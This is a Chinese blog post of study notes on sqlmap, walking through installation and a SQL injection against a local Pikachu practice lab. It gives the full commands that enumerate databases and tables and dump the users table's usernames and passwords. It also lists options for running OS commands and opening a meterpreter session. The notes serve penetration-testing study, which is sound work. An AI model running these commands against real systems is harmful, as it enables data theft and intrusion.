Sqlmap 随记

最新推荐文章于 2024-05-01 12:30:53 发布
最新推荐文章于 2024-05-01 12:30:53 发布
阅读量761 收藏 6
点赞数
分类专栏: 网络安全技术学习 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/orchid_sea/article/details/124449440
版权

sqlmap安装

linux环境下键入命令 apt install sqlmap
在这里插入图片描述老师说,如果遇到如图问题,把文件删掉重新安装就好了;但是呢,按照这个方式我没有解决掉。
那就重新安装sqlmap和依赖库吧:
在这里插入图片描述按照提示,先更新一下apt工具 apt-get update
在这里插入图片描述工具更新完再安装sqlmap
在这里插入图片描述安装完就能成功进入sqlmap了
在这里插入图片描述

sqlmap简单爆破

1.判断注入点 sqlmap -u "url"

GET请求

sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_str.php?name=aaaa&submit=%E6%9F%A5%E8%AF%A2"
在这里插入图片描述

POST请求

一般post方式请求,在抓包中数据位于下方
在这里插入图片描述sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=3&submit=%E6%9F%A5%E8%AF%A2"
在这里插入图片描述在这里插入图片描述

2.爆破数据库名字 sqlmap -u "url" --dbs

在这里插入图片描述sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=3&submit=%E6%9F%A5%E8%AF%A2" --dbs
在这里插入图片描述

3.爆破表名 sqlmap -u "url" --D "当前数据库名" --tables

参数说明:-D是指定数据库名称。
在这里插入图片描述sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=3&submit=%E6%9F%A5%E8%AF%A2" -D "pikachu" --tables
在这里插入图片描述

4.爆破字段名 sqlmap -u "url" --D "当前数据库名" -T "选取一张表" --columns

在这里插入图片描述sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=3&submit=%E6%9F%A5%E8%AF%A2" -D "pikachu" -T "users" --columns
在这里插入图片描述

5.爆破字段 sqlmap -u "url" --D "当前数据库名" -T "选取一张表" -C "当前表的字段" --dump

在这里插入图片描述sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=3&submit=%E6%9F%A5%E8%AF%A2" -D "pikachu" -T "users" -C "username,password" --dump
在这里插入图片描述

sqlmap参数说明

  1. 目标指定类参数
    (1)-d “DBMS:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME” 直接链接数据库
    (2)-u 指定url
    (3)-l <.log文件> 从log文件中解析目标
    (4)-m <文本文件> 从文件中解析目标(日志文件指http请求的日志文件,会自带cookie)
    (5)-g <搜索内容> 以google搜索结果作为目标,注意搜索内容中引号要注意转义

  2. 请求、认证类参数(post重点内容)
    (1)–method=<http方法> 指定使用的http方法
    (2)–data=<post数据> 提交post数据并对post数据进行测试
    (3)–param-del=<分隔符> 指定参数的分隔符
    (4)–cookie <cookie键值对> 添加cookie http请求头(当–level不小于2时,sqlmap会对cookie头检测是否可以注入)
    (5)–headers <http请求头字段和字段值> 添加http请求头,不同的头使用“\n”分隔
    (6)–auth-type、–auth-cred 指定认证方式并指定使用的凭证
    (7)–auth-file 指定使用的证书文件

  3. 优化类参数
    (1)–keep-alive 使用http长连接,该参数与“–proxy”参数矛盾
    (2)–null-connection 只获取http响应的长度(大小)而不获取真正的响应体,可以节约布尔型盲注使用的带宽
    (3)– threads= 设定线程数
    (4)-o 相当于同时设定以上三个参数

  4. 注入功能类参数
    (1)-p <参数列表> 指定要测试的参数不同的参数使用逗号分隔
    (2)–skip=<参数列表> 指定哪些参数不测试,不同参数使用逗号分隔
    (3)* 指出为静态网页的参数位置,如“/id/1*/”
    (4)–dbms <数据库类型> 指定数据库类型 一般不要
    (5)–prefix <前缀> 指定payload的前缀和后缀

  5. 用于sql注入漏洞利用的参数
    5.1 获取数据库内容的常用命令
    (1)-b/–banner 获取数据库版本
    (2)-current-user 显示当前数据库用户名
    (3)–is-dba 判断当前用户是否为管理员用户
    (4)–dbs 列出数据库系统的所有数据库

    5.2 获取数据库内容
    (1)–dbs 爆库
    -D 用数据库
    (2)–tables/–exclude-sysdbs/-D 爆表
    (3)–columns/-C/-T/-D 爆字段
    (4)–dump/-C/-T/-D/–start/–stop/–first/–last 爆内容

  6. 其他重要参数
    (1)–proxy、–proxy-cred、–proxy-file和–ignore-proxy 关于代理的参数
    (2)–tor、–tor-type、–tor-port和–check-tor(所有流量经过tor) 关于tor匿名网络的参数
    (3)–risk 指定风险等级,告诉sqlmap是否要使用高风险的payload(删库改库)
    (4)–level 指定检测等级,告诉sqlmap检测的范围有多大,*该参数比较笼统,可以用-p替代他
    (5)–technique 指定要使用的注入技术,默认情况下sqlmap会使用所有sql注入技术
    (6)–common-tables和–common-columns 暴力破解表名和列名

sqlmap应用流程小结

  1. 检测sql注入漏洞的存在
    sqlmap -m <文件> –level <数字> –risk <数字>……

  2. 使用sqlmap获取数据
    (1)–dbs 爆库
    -D 用数据库
    (2)–tables 爆表
    -T 用表
    (3)–columns
    (4)–dump(注意指定库)

    –dump -all 脱库

  3. 使用sqlmap执行系统命令
    (1)–os-cmd <命令>
    (2)–os-pwn –msf-path <路径>——开启一个meterpreter session
    (仅限mysql、postgersql、mssql)

777sea
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据库的控制和数据的提取。标题"sqlmap-master"暗示了我们讨论...
SQLMAP Windows
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
sqlmap使用
qq_56486005的博客
09-24 522
Sqlmap实战操作 常用命令: 1.检查注入点: sqlmap -u “http://ooxx.com/a.php?=1” --dbs 2.指定数据库名列出所有表 sqlmap -u “http://ooxx.com?a.php?id=1” -D dbsname --tables 3.指定数据库名表名列出所有字段sqlmap -u “http://ooxx.com/a.php?id=1” -D dbname -T tablename --columns 4.指定数据库名表名字段dump出指
sqlmap入门-库,表,列,字段
weixin_46626737的博客
11-14 6982
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs数据库 假设结果中有member数据库 ②表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④字段 python sq
SQL 注入神器:SQLMap 参数详解
最新发布
Flag少侠的博客
05-01 2179
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
Sqlmap入门库、表、字段记录
weixin_56306210的博客
10-31 2247
Sqlmap库、表、字段记录
【网安神器篇】——Sqlmap详解
Innocence_0的博客
01-28 1088
当我们明白sql注入的原理,渗透过程似乎很简单。但事实上,在实际的渗透当中,漏洞注入并非仅仅只是通过简单的一两次尝试就能够得到测试人员想要的答案。很多时候,它需要经过许多次繁杂的尝试。所以,要提高渗透测试的效率,单纯的依靠测试人员自身的实战经验也是远远不够的。因此,我们需要渗透工具的帮助。而sqlmap就是这样一款强大而且便于操作的渗透测试工具。sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
slqmap的字段(以本地搭建的DVWA为例)
PromisingQ
07-09 1171
环境 window10、sqlmap、本地搭建的DVWA 步骤 1、先将DVWA安全等级设置为low 2、选择SQL Injection输入1查询 3、将url复制下来,并查看cookie信息 url:http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# cookie="Cookie: security=low; PHPSESSID=7si7t5md1ntl03q0oc1ktcm0q2" 4、打开sqlmap使
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
sqlmap安装包
01-19
**SQLMap介绍** SQLMap是一款开源的自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它能够帮助安全研究人员或渗透测试人员快速、准确地发现和利用目标系统中的SQL注入漏洞,从而提高测试效率。SQLMap的强大...
sqlmap.zip
10-31
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞。该工具在信息安全领域广泛应用,特别是对于网站渗透测试和安全审计。2019年10月20日,这个版本是从GitHub上获取的,它代表了当时sqlmap的...
liushan63_csdn的博客
08-26 100
2020-08-25 周二。晚上8点之前。
sqlmap1.1.3官方版
weixin_30677073的博客
01-29 388
下载地址:网盘下载Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点:完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。完...
sqlmap 使用方法
ilkj的博客
05-20 618
sqlmap 使用方法 Usage: python3 sqlmap [options] Options: -h, --help Show basic help message and exit(显示基本帮助信息并退出) -hh Show advanced help message and exit(显示高级帮助信息并退出) --version Show program's version number and ex
SQLmap
m0_56010012的博客
05-05 1248
sqlmap注入的一般流程 判断是否存在注入点 查询数据库信息 根据数据库破数据表 根据数据库名和数据表名字段字段里面的数据 sqlmap注入的命令参数: 1、判断注入点:sqlmap.py -u url (目标地址) 2.破数据库名:sqlmap.py -u http://xxx.com/?id=1 --dbs --dbs查看所有数据库名 --current-db:查看当前使用的数据库 3.破数据表名:sqlmap.py -u url -D 库名 --tables
sqlmap学习笔记
y4ung
07-02 4233
0x00 前言 本文是我在学习sqlmap中的笔记。刚开始学习网络安全,准备从web入手。不管怎样,加油吧! 0x01 笔记 库:sqlmap -u url --dbs 表:sqlmap -u url -D 数据库名 --tables 字段sqlmap -u url -D 数据库名 -T 表名 --columns 字段的值:sqlmap -u url -D 数据库名 -T 表名 -C ...
sqlmap 使用和破记录
野路子云遇见不同的自己
07-18 1272
sqlmap -u 网址 -T uname - C login_name,pass,username --dump #-C 指定要找的列、 --dump。sqlmap -u 网址 --dbs --dbms mysql -T admin -C user,pwd --dump #查询具体列的值。sqlmap -u 网址 --dbs --dbms mysql -D cmxt --tables #cmxt 是数据库。搜索 -》 公司 inurl:asp?
破dvwa数据库
m0_65150886的博客
08-28 172
sqlmap.py -r bc.txt --dbs 查询所有的数据库。
sqlmap 依赖包
08-21
- *1* *2* [Sqlmap 随记](https://blog.csdn.net/orchid_sea/article/details/124449440)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值